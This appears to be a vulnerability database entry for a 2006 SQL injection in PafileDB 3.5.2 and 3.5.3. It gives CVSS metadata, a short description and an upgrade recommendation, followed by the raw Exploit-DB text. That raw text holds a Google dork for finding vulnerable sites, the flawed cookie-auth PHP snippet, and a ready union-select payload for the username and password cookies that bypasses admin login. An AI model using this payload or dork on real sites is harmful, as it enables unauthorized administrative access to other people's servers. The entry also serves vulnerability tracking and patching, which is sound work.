PafileDB Login SQL injection

vendor:

PafileDB

by:

koray & manyak@mypower.org

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: PafileDB

Affected Version From: 3.5.2

Affected Version To: 3.5.3

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

PafileDB Login SQL injection

The vulnerability exists in the include/admin/auth.php file of the PafileDB 3.5.2 and 3.5.3 versions. An attacker can exploit this vulnerability by sending a crafted cookie with a username and password containing a SQL injection payload. This will allow the attacker to bypass authentication and gain access to the admin panel.

Mitigation:

Upgrade to the latest version of PafileDB and ensure that all input is properly sanitized and validated.

Source

Exploit-DB raw data:

# PafileDB Login SQL injection =)
# author : koray & manyak@mypower.org
# Risk : High
# Class : Remote
# Vulnerable Script : pafileDB
# Version : 3.5.2 / 3.5.3
# google : powered by pafiledb 3.5.3/2
# greetz : www.cigicigi.net & redhackers

Vulnerable;
include/admin/auth.php

c0de ;
if (isset($_COOKIE['pafiledb_user']) && isset($_COOKIE['pafiledb_pass'])) { //If the cookie exists, do all this:
    
    $admininfo = array();
    if (checkpass($_COOKIE['pafiledb_user'], $_COOKIE['pafiledb_pass'], $admininfo)) {
        //checkpass() returned true, so the user exists
        
        //$adminloggedin is a var used throughout the script to see if someone's logged in.
        $adminloggedin = true;
        $smarty->assign('admininfo', $admininfo[0]);
        
    } else { //The cookie exists, but the user/pass don't match
...

username : 1%20union%20select%%20201,2,3,4/*
password : 1%20union%20select%%20201,2,3,4/* /

pafile/pafiledb.php?action=admin logged...

# milw0rm.com [2006-12-08]